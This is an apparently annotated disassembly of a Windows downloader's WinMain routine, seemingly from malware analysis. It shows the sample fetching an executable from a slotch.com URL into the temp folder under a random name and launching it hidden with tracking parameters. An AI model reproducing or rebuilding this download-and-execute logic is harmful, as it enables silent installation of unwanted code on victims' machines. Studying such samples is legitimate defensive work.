_2ds:004012D8 ; ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ S U B R O U T I N E ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ _2ds:004012D8 _2ds:004012D8 ; Attributes: bp-based frame _2ds:004012D8 _2ds:004012D8 WinMain proc near ; CODE XREF: _2ds:004015FBp _2ds:004012D8 _2ds:004012D8 parameters = byte ptr -208h _2ds:004012D8 fileString = byte ptr -104h _2ds:004012D8 _2ds:004012D8 push ebp _2ds:004012D9 mov ebp, esp _2ds:004012DB sub esp, 208h _2ds:004012E1 push offset tempPathName _2ds:004012E6 push 104h ; Buffer length _2ds:004012EB call ds:GetTempPathA _2ds:004012F1 mov eax, ds:paramString _2ds:004012F6 push eax ; "/aid:153894 /cfg:mtb" _2ds:004012F7 push offset aS ; Format string "%s" _2ds:004012FC lea ecx, [ebp+parameters] _2ds:00401302 push ecx _2ds:00401303 call ds:sprintf _2ds:00401309 add esp, 0Ch _2ds:0040130C call ds:argc _2ds:00401312 cmp dword ptr [eax], 1 _2ds:00401315 jle short noParameters _2ds:00401317 call ds:argv _2ds:0040131D mov edx, [eax] _2ds:0040131F cmp dword ptr [edx+4], 0 _2ds:00401323 jz short noParameters _2ds:00401325 call ds:argv _2ds:0040132B mov eax, [eax] _2ds:0040132D mov ecx, [eax+4] _2ds:00401330 push ecx _2ds:00401331 lea edx, [ebp+parameters] _2ds:00401337 push edx _2ds:00401338 push offset aSSubS ; "%s /sub:%s" _2ds:0040133D lea eax, [ebp+parameters] _2ds:00401343 push eax _2ds:00401344 call ds:sprintf _2ds:0040134A add esp, 10h _2ds:0040134D _2ds:0040134D noParameters: ; CODE XREF: WinMain+3Dj _2ds:0040134D ; WinMain+4Bj _2ds:0040134D push offset tempPathName _2ds:00401352 lea ecx, [ebp+fileString] _2ds:00401358 push ecx ; Buffer for temp path _2ds:00401359 call j_strcpy _2ds:0040135E add esp, 8 _2ds:00401361 mov edx, ds:tempFilename ; fGCdZb6.exe _2ds:00401367 push edx _2ds:00401368 lea eax, [ebp+fileString] _2ds:0040136E push eax _2ds:0040136F call j_strcat _2ds:00401374 add esp, 8 _2ds:00401377 lea ecx, [ebp+fileString] _2ds:0040137D push ecx _2ds:0040137E push offset aHttpWww_slotch ; "http://www.slotch.com/ist/softwares/v4."... _2ds:00401383 call downloadFile _2ds:00401388 add esp, 8 _2ds:0040138B test eax, eax _2ds:0040138D jnz short downloadSucceeded _2ds:0040138F or eax, 0FFFFFFFFh _2ds:00401392 jmp short loc_0_4013D2 _2ds:00401394 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ _2ds:00401394 _2ds:00401394 downloadSucceeded: ; CODE XREF: WinMain+B5j _2ds:00401394 lea edx, [ebp+fileString] _2ds:0040139A push edx _2ds:0040139B call setAl _2ds:004013A0 add esp, 4 _2ds:004013A3 and eax, 0FFh _2ds:004013A8 test eax, eax _2ds:004013AA jz short loc_0_4013D0 _2ds:004013AC push 0 ; nShowCmd = SW_HIDE _2ds:004013AE push 0 ; lpDirectory _2ds:004013B0 lea eax, [ebp+parameters] _2ds:004013B6 push eax ; lpParameters _2ds:004013B7 lea ecx, [ebp+fileString] _2ds:004013BD push ecx ; lpFile _2ds:004013BE push 0 ; lpOperation _2ds:004013C0 push 0 ; HWND _2ds:004013C2 call ds:ShellExecuteA _2ds:004013C8 test eax, eax _2ds:004013CA jz short loc_0_4013D0 _2ds:004013CC xor eax, eax _2ds:004013CE jmp short loc_0_4013D2 _2ds:004013D0 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ _2ds:004013D0 _2ds:004013D0 loc_0_4013D0: ; CODE XREF: WinMain+D2j _2ds:004013D0 ; WinMain+F2j _2ds:004013D0 xor eax, eax _2ds:004013D2 _2ds:004013D2 loc_0_4013D2: ; CODE XREF: WinMain+BAj _2ds:004013D2 ; WinMain+F6j _2ds:004013D2 mov esp, ebp _2ds:004013D4 pop ebp _2ds:004013D5 retn 10h _2ds:004013D5 WinMain endp